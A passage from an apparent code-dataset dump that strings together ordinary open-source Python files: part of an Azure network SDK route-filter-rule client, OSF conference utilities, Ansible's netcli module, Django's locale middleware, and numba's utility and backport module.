) -> AsyncLROPoller["_models.RouteFilterRule"]:
"""Updates a route in the specified route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param rule_name: The name of the route filter rule.
:type rule_name: str
:param route_filter_rule_parameters: Parameters supplied to the update route filter rule
operation.
:type route_filter_rule_parameters: ~azure.mgmt.network.v2019_02_01.models.PatchRouteFilterRule
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either RouteFilterRule or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_02_01.models.RouteFilterRule]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRule"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
route_filter_name=route_filter_name,
rule_name=rule_name,
route_filter_rule_parameters=route_filter_rule_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
def list_by_route_filter(
self,
resource_group_name: str,
route_filter_name: str,
**kwargs
) -> AsyncIterable["_models.RouteFilterRuleListResult"]:
"""Gets all RouteFilterRules in a route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either RouteFilterRuleListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_02_01.models.RouteFilterRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_route_filter.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('RouteFilterRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_route_filter.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules'} # type: ignore
| mit |
cslzchen/osf.io | website/conferences/utils.py | 6 | 2593 | # -*- coding: utf-8 -*-
import requests
from framework.auth import Auth
from addons.wiki.models import WikiPage
from website import settings
from osf.models import MailRecord
from api.base.utils import waterbutler_api_url_for
from osf.exceptions import NodeStateError
from osf.utils.permissions import ADMIN
from django.core.exceptions import ValidationError
from django.core.validators import validate_email
def record_message(message, node_created, user_created):
record = MailRecord.objects.create(
data=message.raw,
)
if user_created:
record.users_created.add(user_created)
record.nodes_created.add(node_created)
record.save()
def provision_node(conference, message, node, user):
"""
:param Conference conference:
:param ConferenceMessage message:
:param Node node:
:param User user:
"""
auth = Auth(user=user)
try:
wiki = WikiPage.objects.create_for_node(node, 'home', message.text, auth)
except NodeStateError:
wiki = WikiPage.objects.get_for_node(node, 'home')
wiki.update(user, message.text)
if conference.admins.exists():
node.add_contributors(prepare_contributors(conference.admins.all()), log=False)
if not message.is_spam and conference.public_projects:
node.set_privacy('public', meeting_creation=True, auth=auth)
conference.submissions.add(node)
node.add_tag(message.conference_category, auth=auth)
for systag in ['emailed', message.conference_name, message.conference_category]:
node.add_system_tag(systag, save=False)
if message.is_spam:
node.add_system_tag('spam', save=False)
node.save()
def prepare_contributors(admins):
return [
{
'user': admin,
'permissions': ADMIN,
'visible': False,
}
for admin in admins
]
def upload_attachment(user, node, attachment):
attachment.seek(0)
name = (attachment.filename or settings.MISSING_FILE_NAME)
content = attachment.read()
upload_url = waterbutler_api_url_for(node._id, 'osfstorage', name=name, base_url=node.osfstorage_region.waterbutler_url, cookie=user.get_or_create_cookie().decode(), _internal=True)
resp = requests.put(
upload_url,
data=content,
)
resp.raise_for_status()
def upload_attachments(user, node, attachments):
for attachment in attachments:
upload_attachment(user, node, attachment)
def is_valid_email(email):
try:
validate_email(email)
return True
except ValidationError:
return False
| apache-2.0 |
jonathonwalz/ansible | lib/ansible/module_utils/netcli.py | 18 | 9677 | # This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Copyright (c) 2015 Peter Sprygada, <psprygada@ansible.com>
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import shlex
import time
from ansible.module_utils.basic import BOOLEANS_TRUE, BOOLEANS_FALSE, get_exception
from ansible.module_utils.six import string_types, text_type
from ansible.module_utils.six.moves import zip
def to_list(val):
if isinstance(val, (list, tuple)):
return list(val)
elif val is not None:
return [val]
else:
return list()
class FailedConditionsError(Exception):
def __init__(self, msg, failed_conditions):
super(FailedConditionsError, self).__init__(msg)
self.failed_conditions = failed_conditions
class FailedConditionalError(Exception):
def __init__(self, msg, failed_conditional):
super(FailedConditionalError, self).__init__(msg)
self.failed_conditional = failed_conditional
class AddCommandError(Exception):
def __init__(self, msg, command):
super(AddCommandError, self).__init__(msg)
self.command = command
class AddConditionError(Exception):
def __init__(self, msg, condition):
super(AddConditionError, self).__init__(msg)
self.condition = condition
class Cli(object):
def __init__(self, connection):
self.connection = connection
self.default_output = connection.default_output or 'text'
self._commands = list()
@property
def commands(self):
return [str(c) for c in self._commands]
def __call__(self, commands, output=None):
objects = list()
for cmd in to_list(commands):
objects.append(self.to_command(cmd, output))
return self.connection.run_commands(objects)
def to_command(self, command, output=None, prompt=None, response=None, **kwargs):
output = output or self.default_output
if isinstance(command, Command):
return command
if isinstance(prompt, string_types):
prompt = re.compile(re.escape(prompt))
return Command(command, output, prompt=prompt, response=response, **kwargs)
def add_commands(self, commands, output=None, **kwargs):
for cmd in commands:
self._commands.append(self.to_command(cmd, output, **kwargs))
def run_commands(self):
responses = self.connection.run_commands(self._commands)
for resp, cmd in zip(responses, self._commands):
cmd.response = resp
# wipe out the commands list to avoid issues if additional
# commands are executed later
self._commands = list()
return responses
class Command(object):
def __init__(self, command, output=None, prompt=None, response=None,
**kwargs):
self.command = command
self.output = output
self.command_string = command
self.prompt = prompt
self.response = response
self.args = kwargs
def __str__(self):
return self.command_string
class CommandRunner(object):
def __init__(self, module):
self.module = module
self.items = list()
self.conditionals = set()
self.commands = list()
self.retries = 10
self.interval = 1
self.match = 'all'
self._default_output = module.connection.default_output
def add_command(self, command, output=None, prompt=None, response=None,
**kwargs):
if command in [str(c) for c in self.commands]:
raise AddCommandError('duplicated command detected', command=command)
cmd = self.module.cli.to_command(command, output=output, prompt=prompt,
response=response, **kwargs)
self.commands.append(cmd)
def get_command(self, command, output=None):
for cmd in self.commands:
if cmd.command == command:
return cmd.response
raise ValueError("command '%s' not found" % command)
def get_responses(self):
return [cmd.response for cmd in self.commands]
def add_conditional(self, condition):
try:
self.conditionals.add(Conditional(condition))
except AttributeError:
exc = get_exception()
raise AddConditionError(msg=str(exc), condition=condition)
def run(self):
while self.retries > 0:
self.module.cli.add_commands(self.commands)
responses = self.module.cli.run_commands()
for item in list(self.conditionals):
if item(responses):
if self.match == 'any':
return item
self.conditionals.remove(item)
if not self.conditionals:
break
time.sleep(self.interval)
self.retries -= 1
else:
failed_conditions = [item.raw for item in self.conditionals]
errmsg = 'One or more conditional statements have not been satisfied'
raise FailedConditionsError(errmsg, failed_conditions)
class Conditional(object):
"""Used in command modules to evaluate waitfor conditions
"""
OPERATORS = {
'eq': ['eq', '=='],
'neq': ['neq', 'ne', '!='],
'gt': ['gt', '>'],
'ge': ['ge', '>='],
'lt': ['lt', '<'],
'le': ['le', '<='],
'contains': ['contains'],
'matches': ['matches']
}
def __init__(self, conditional, encoding=None):
self.raw = conditional
try:
key, op, val = shlex.split(conditional)
except ValueError:
raise ValueError('failed to parse conditional')
self.key = key
self.func = self._func(op)
self.value = self._cast_value(val)
def __call__(self, data):
value = self.get_value(dict(result=data))
return self.func(value)
def _cast_value(self, value):
if value in BOOLEANS_TRUE:
return True
elif value in BOOLEANS_FALSE:
return False
elif re.match(r'^\d+\.d+$', value):
return float(value)
elif re.match(r'^\d+$', value):
return int(value)
else:
return text_type(value)
def _func(self, oper):
for func, operators in self.OPERATORS.items():
if oper in operators:
return getattr(self, func)
raise AttributeError('unknown operator: %s' % oper)
def get_value(self, result):
try:
return self.get_json(result)
except (IndexError, TypeError, AttributeError):
msg = 'unable to apply conditional to result'
raise FailedConditionalError(msg, self.raw)
def get_json(self, result):
string = re.sub(r"\[[\'|\"]", ".", self.key)
string = re.sub(r"[\'|\"]\]", ".", string)
parts = re.split(r'\.(?=[^\]]*(?:\[|$))', string)
for part in parts:
match = re.findall(r'\[(\S+?)\]', part)
if match:
key = part[:part.find('[')]
result = result[key]
for m in match:
try:
m = int(m)
except ValueError:
m = str(m)
result = result[m]
else:
result = result.get(part)
return result
def number(self, value):
if '.' in str(value):
return float(value)
else:
return int(value)
def eq(self, value):
return value == self.value
def neq(self, value):
return value != self.value
def gt(self, value):
return self.number(value) > self.value
def ge(self, value):
return self.number(value) >= self.value
def lt(self, value):
return self.number(value) < self.value
def le(self, value):
return self.number(value) <= self.value
def contains(self, value):
return str(self.value) in value
def matches(self, value):
match = re.search(self.value, value, re.M)
return match is not None
| gpl-3.0 |
Beauhurst/django | django/middleware/locale.py | 35 | 3058 | from django.conf import settings
from django.conf.urls.i18n import is_language_prefix_patterns_used
from django.http import HttpResponseRedirect
from django.urls import get_script_prefix, is_valid_path
from django.utils import translation
from django.utils.cache import patch_vary_headers
from django.utils.deprecation import MiddlewareMixin
class LocaleMiddleware(MiddlewareMixin):
"""
Parse a request and decide what translation object to install in the
current thread context. This allows pages to be dynamically translated to
the language the user desires (if the language is available, of course).
"""
response_redirect_class = HttpResponseRedirect
def process_request(self, request):
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
i18n_patterns_used, prefixed_default_language = is_language_prefix_patterns_used(urlconf)
language = translation.get_language_from_request(request, check_path=i18n_patterns_used)
language_from_path = translation.get_language_from_path(request.path_info)
if not language_from_path and i18n_patterns_used and not prefixed_default_language:
language = settings.LANGUAGE_CODE
translation.activate(language)
request.LANGUAGE_CODE = translation.get_language()
def process_response(self, request, response):
language = translation.get_language()
language_from_path = translation.get_language_from_path(request.path_info)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
i18n_patterns_used, prefixed_default_language = is_language_prefix_patterns_used(urlconf)
if (response.status_code == 404 and not language_from_path and
i18n_patterns_used and prefixed_default_language):
# Maybe the language code is missing in the URL? Try adding the
# language prefix and redirecting to that URL.
language_path = '/%s%s' % (language, request.path_info)
path_valid = is_valid_path(language_path, urlconf)
path_needs_slash = (
not path_valid and (
settings.APPEND_SLASH and not language_path.endswith('/') and
is_valid_path('%s/' % language_path, urlconf)
)
)
if path_valid or path_needs_slash:
script_prefix = get_script_prefix()
# Insert language after the script prefix and before the
# rest of the URL
language_url = request.get_full_path(force_append_slash=path_needs_slash).replace(
script_prefix,
'%s%s/' % (script_prefix, language),
1
)
return self.response_redirect_class(language_url)
if not (i18n_patterns_used and language_from_path):
patch_vary_headers(response, ('Accept-Language',))
if 'Content-Language' not in response:
response['Content-Language'] = language
return response
| bsd-3-clause |
GaZ3ll3/numba | numba/utils.py | 1 | 27776 | from __future__ import print_function, division, absolute_import
import atexit
import collections
import functools
import io
import itertools
import os
import threading
import timeit
import math
import sys
import numpy
from .six import *
from numba.config import PYVERSION, MACHINE_BITS
IS_PY3 = PYVERSION >= (3, 0)
if IS_PY3:
import builtins
INT_TYPES = (int,)
longint = int
get_ident = threading.get_ident
intern = sys.intern
file_replace = os.replace
else:
import thread
import __builtin__ as builtins
INT_TYPES = (int, long)
longint = long
get_ident = thread.get_ident
intern = intern
if sys.platform == 'win32':
def file_replace(src, dest):
# Best-effort emulation of os.replace()
try:
os.rename(src, dest)
except OSError:
os.unlink(dest)
os.rename(src, dest)
else:
file_replace = os.rename
try:
from inspect import signature as pysignature
except ImportError:
try:
from funcsigs import signature as pysignature
except ImportError:
raise ImportError("please install the 'funcsigs' package "
"('pip install funcsigs')")
try:
from functools import singledispatch
except ImportError:
try:
from singledispatch import singledispatch
except ImportError:
raise ImportError("please install the 'singledispatch' package "
"('pip install singledispatch')")
# Mapping between operator module functions and the corresponding built-in
# operators.
operator_map = [
# Binary
('add', 'iadd', '+'),
('sub', 'isub', '-'),
('mul', 'imul', '*'),
('floordiv', 'ifloordiv', '//'),
('truediv', 'itruediv', '/'),
('mod', 'imod', '%'),
('pow', 'ipow', '**'),
('and_', 'iand', '&'),
('or_', 'ior', '|'),
('xor', 'ixor', '^'),
('lshift', 'ilshift', '<<'),
('rshift', 'irshift', '>>'),
('eq', '', '=='),
('ne', '', '!='),
('lt', '', '<'),
('le', '', '<='),
('gt', '', '>'),
('ge', '', '>='),
# Unary
('pos', '', '+'),
('neg', '', '-'),
('invert', '', '~'),
('not_', '', 'not'),
]
if not IS_PY3:
operator_map.append(('div', 'idiv', '/?'))
# Map of known in-place operators to their corresponding copying operators
inplace_map = dict((op + '=', op)
for (_bin, _inp, op) in operator_map
if _inp)
_shutting_down = False
def _at_shutdown():
global _shutting_down
_shutting_down = True
atexit.register(_at_shutdown)
def shutting_down(globals=globals):
"""
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
# At shutdown, the attribute may have been cleared or set to None.
v = globals().get('_shutting_down')
return v is True or v is None
class ConfigOptions(object):
OPTIONS = ()
def __init__(self):
self._enabled = set()
def set(self, name):
if name not in self.OPTIONS:
raise NameError("Invalid flag: %s" % name)
self._enabled.add(name)
def unset(self, name):
if name not in self.OPTIONS:
raise NameError("Invalid flag: %s" % name)
self._enabled.discard(name)
def __getattr__(self, name):
if name not in self.OPTIONS:
raise NameError("Invalid flag: %s" % name)
return name in self._enabled
def __repr__(self):
return "Flags(%s)" % ', '.join(str(x) for x in self._enabled)
def copy(self):
copy = type(self)()
copy._enabled = set(self._enabled)
return copy
def __eq__(self, other):
return isinstance(other, ConfigOptions) and other._enabled == self._enabled
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(tuple(sorted(self._enabled)))
class SortedMap(collections.Mapping):
"""Immutable
"""
def __init__(self, seq):
self._values = []
self._index = {}
for i, (k, v) in enumerate(sorted(seq)):
self._index[k] = i
self._values.append((k, v))
def __getitem__(self, k):
i = self._index[k]
return self._values[i][1]
def __len__(self):
return len(self._values)
def __iter__(self):
return iter(k for k, v in self._values)
class SortedSet(collections.Set):
def __init__(self, seq):
self._set = set(seq)
self._values = list(sorted(self._set))
def __contains__(self, item):
return item in self._set
def __len__(self):
return len(self._values)
def __iter__(self):
return iter(self._values)
class UniqueDict(dict):
def __setitem__(self, key, value):
if key in self:
raise AssertionError("key already in dictionary: %r" % (key,))
super(UniqueDict, self).__setitem__(key, value)
class NonReentrantLock(object):
"""
A lock class which explicitly forbids reentrancy.
"""
def __init__(self):
self._lock = threading.Lock()
self._owner = None
def acquire(self):
me = get_ident()
if me == self._owner:
raise RuntimeError("cannot re-acquire lock from same thread")
self._lock.acquire()
self._owner = me
def release(self):
if self._owner != get_ident():
raise RuntimeError("cannot release un-acquired lock")
self._owner = None
self._lock.release()
def is_owned(self):
"""
Whether the lock is owned by the current thread.
"""
return self._owner == get_ident()
__enter__ = acquire
def __exit__(self, t, v, tb):
self.release()
# Django's cached_property
# see https://docs.djangoproject.com/en/dev/ref/utils/#django.utils.functional.cached_property
class cached_property(object):
"""
Decorator that converts a method with a single self argument into a
property cached on the instance.
Optional ``name`` argument allows you to make cached properties of other
methods. (e.g. url = cached_property(get_absolute_url, name='url') )
"""
def __init__(self, func, name=None):
self.func = func
self.name = name or func.__name__
def __get__(self, instance, type=None):
if instance is None:
return self
res = instance.__dict__[self.name] = self.func(instance)
return res
def runonce(fn):
@functools.wraps(fn)
def inner():
if not inner._ran:
res = fn()
inner._result = res
inner._ran = True
return inner._result
inner._ran = False
return inner
def bit_length(intval):
"""
Return the number of bits necessary to represent integer `intval`.
"""
assert isinstance(intval, INT_TYPES)
return len(bin(abs(intval))) - 2
class BenchmarkResult(object):
def __init__(self, func, records, loop):
self.func = func
self.loop = loop
self.records = numpy.array(records) / loop
self.best = numpy.min(self.records)
def __repr__(self):
name = getattr(self.func, "__name__", self.func)
args = (name, self.loop, self.records.size, format_time(self.best))
return "%20s: %10d loops, best of %d: %s per loop" % args
def format_time(tm):
units = "s ms us ns ps".split()
base = 1
for unit in units[:-1]:
if tm >= base:
break
base /= 1000
else:
unit = units[-1]
return "%.1f%s" % (tm / base, unit)
def benchmark(func, maxsec=1):
timer = timeit.Timer(func)
number = 1
result = timer.repeat(1, number)
# Too fast to be measured
while min(result) / number == 0:
number *= 10
result = timer.repeat(3, number)
best = min(result) / number
if best >= maxsec:
return BenchmarkResult(func, result, number)
# Scale it up to make it close the maximum time
max_per_run_time = maxsec / 3 / number
number = max(max_per_run_time / best / 3, 1)
# Round to the next power of 10
number = int(10 ** math.ceil(math.log10(number)))
records = timer.repeat(3, number)
return BenchmarkResult(func, records, number)
RANGE_ITER_OBJECTS = (builtins.range,)
if PYVERSION < (3, 0):
RANGE_ITER_OBJECTS += (builtins.xrange,)
try:
from future.types.newrange import newrange
RANGE_ITER_OBJECTS += (newrange,)
except ImportError:
pass
# Backported from Python 3.4: functools.total_ordering()
def _not_op(op, other):
# "not a < b" handles "a >= b"
# "not a <= b" handles "a > b"
# "not a >= b" handles "a < b"
# "not a > b" handles "a <= b"
op_result = op(other)
if op_result is NotImplemented:
return NotImplemented
return not op_result
def _op_or_eq(op, self, other):
# "a < b or a == b" handles "a <= b"
# "a > b or a == b" handles "a >= b"
op_result = op(other)
if op_result is NotImplemented:
return NotImplemented
return op_result or self == other
def _not_op_and_not_eq(op, self, other):
# "not (a < b or a == b)" handles "a > b"
# "not a < b and a != b" is equivalent
# "not (a > b or a == b)" handles "a < b"
# "not a > b and a != b" is equivalent
op_result = op(other)
if op_result is NotImplemented:
return NotImplemented
return not op_result and self != other
def _not_op_or_eq(op, self, other):
# "not a <= b or a == b" handles "a >= b"
# "not a >= b or a == b" handles "a <= b"
op_result = op(other)
if op_result is NotImplemented:
return NotImplemented
return not op_result or self == other
def _op_and_not_eq(op, self, other):
# "a <= b and not a == b" handles "a < b"
# "a >= b and not a == b" handles "a > b"
op_result = op(other)
if op_result is NotImplemented:
return NotImplemented
return op_result and self != other
def _is_inherited_from_object(cls, op):
"""
Whether operator *op* on *cls* is inherited from the root object type.
"""
if PYVERSION >= (3,):
object_op = getattr(object, op)
cls_op = getattr(cls, op)
return object_op is cls_op
else:
# In 2.x, the inherited operator gets a new descriptor, so identity
# doesn't work. OTOH, dir() doesn't list methods inherited from
# object (which it does in 3.x).
return op not in dir(cls)
def total_ordering(cls):
"""Class decorator that fills in missing ordering methods"""
convert = {
'__lt__': [('__gt__',
lambda self, other: _not_op_and_not_eq(self.__lt__, self,
other)),
('__le__',
lambda self, other: _op_or_eq(self.__lt__, self, other)),
('__ge__', lambda self, other: _not_op(self.__lt__, other))],
'__le__': [('__ge__',
lambda self, other: _not_op_or_eq(self.__le__, self,
other)),
('__lt__',
lambda self, other: _op_and_not_eq(self.__le__, self,
other)),
('__gt__', lambda self, other: _not_op(self.__le__, other))],
'__gt__': [('__lt__',
lambda self, other: _not_op_and_not_eq(self.__gt__, self,
other)),
('__ge__',
lambda self, other: _op_or_eq(self.__gt__, self, other)),
('__le__', lambda self, other: _not_op(self.__gt__, other))],
'__ge__': [('__le__',
lambda self, other: _not_op_or_eq(self.__ge__, self,
other)),
('__gt__',
lambda self, other: _op_and_not_eq(self.__ge__, self,
other)),
('__lt__', lambda self, other: _not_op(self.__ge__, other))]
}
# Find user-defined comparisons (not those inherited from object).
roots = [op for op in convert if not _is_inherited_from_object(cls, op)]
if not roots:
raise ValueError(
'must define at least one ordering operation: < > <= >=')
root = max(roots) # prefer __lt__ to __le__ to __gt__ to __ge__
for opname, opfunc in convert[root]:
if opname not in roots:
opfunc.__name__ = opname
opfunc.__doc__ = getattr(int, opname).__doc__
setattr(cls, opname, opfunc)
return cls
# Backported from Python 3.4: weakref.finalize()
from weakref import ref
class finalize:
"""Class for finalization of weakrefable objects
finalize(obj, func, *args, **kwargs) returns a callable finalizer
object which will be called when obj is garbage collected. The
first time the finalizer is called it evaluates func(*arg, **kwargs)
and returns the result. After this the finalizer is dead, and
calling it just returns None.
When the program exits any remaining finalizers for which the
atexit attribute is true will be run in reverse order of creation.
By default atexit is true.
"""
# Finalizer objects don't have any state of their own. They are
# just used as keys to lookup _Info objects in the registry. This
# ensures that they cannot be part of a ref-cycle.
__slots__ = ()
_registry = {}
_shutdown = False
_index_iter = itertools.count()
_dirty = False
_registered_with_atexit = False
class _Info:
__slots__ = ("weakref", "func", "args", "kwargs", "atexit", "index")
def __init__(self, obj, func, *args, **kwargs):
if not self._registered_with_atexit:
# We may register the exit function more than once because
# of a thread race, but that is harmless
import atexit
atexit.register(self._exitfunc)
finalize._registered_with_atexit = True
info = self._Info()
info.weakref = ref(obj, self)
info.func = func
info.args = args
info.kwargs = kwargs or None
info.atexit = True
info.index = next(self._index_iter)
self._registry[self] = info
finalize._dirty = True
def __call__(self, _=None):
"""If alive then mark as dead and return func(*args, **kwargs);
otherwise return None"""
info = self._registry.pop(self, None)
if info and not self._shutdown:
return info.func(*info.args, **(info.kwargs or {}))
def detach(self):
"""If alive then mark as dead and return (obj, func, args, kwargs);
otherwise return None"""
info = self._registry.get(self)
obj = info and info.weakref()
if obj is not None and self._registry.pop(self, None):
return (obj, info.func, info.args, info.kwargs or {})
def peek(self):
"""If alive then return (obj, func, args, kwargs);
otherwise return None"""
info = self._registry.get(self)
obj = info and info.weakref()
if obj is not None:
return (obj, info.func, info.args, info.kwargs or {})
@property
def alive(self):
"""Whether finalizer is alive"""
return self in self._registry
@property
def atexit(self):
"""Whether finalizer should be called at exit"""
info = self._registry.get(self)
return bool(info) and info.atexit
@atexit.setter
def atexit(self, value):
info = self._registry.get(self)
if info:
info.atexit = bool(value)
def __repr__(self):
info = self._registry.get(self)
obj = info and info.weakref()
if obj is None:
return '<%s object at %#x; dead>' % (type(self).__name__, id(self))
else:
return '<%s object at %#x; for %r at %#x>' % \
(type(self).__name__, id(self), type(obj).__name__, id(obj))
@classmethod
def _select_for_exit(cls):
# Return live finalizers marked for exit, oldest first
L = [(f,i) for (f,i) in cls._registry.items() if i.atexit]
L.sort(key=lambda item:item[1].index)
return [f for (f,i) in L]
@classmethod
def _exitfunc(cls):
# At shutdown invoke finalizers for which atexit is true.
# This is called once all other non-daemonic threads have been
# joined.
reenable_gc = False
try:
if cls._registry:
import gc
if gc.isenabled():
reenable_gc = True
gc.disable()
pending = None
while True:
if pending is None or finalize._dirty:
pending = cls._select_for_exit()
finalize._dirty = False
if not pending:
break
f = pending.pop()
try:
# gc is disabled, so (assuming no daemonic
# threads) the following is the only line in
# this function which might trigger creation
# of a new finalizer
f()
except Exception:
sys.excepthook(*sys.exc_info())
assert f not in cls._registry
finally:
# prevent any more finalizers from executing during shutdown
finalize._shutdown = True
if reenable_gc:
gc.enable()
try:
from collections import OrderedDict
except ImportError:
# Copied from http://code.activestate.com/recipes/576693/
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
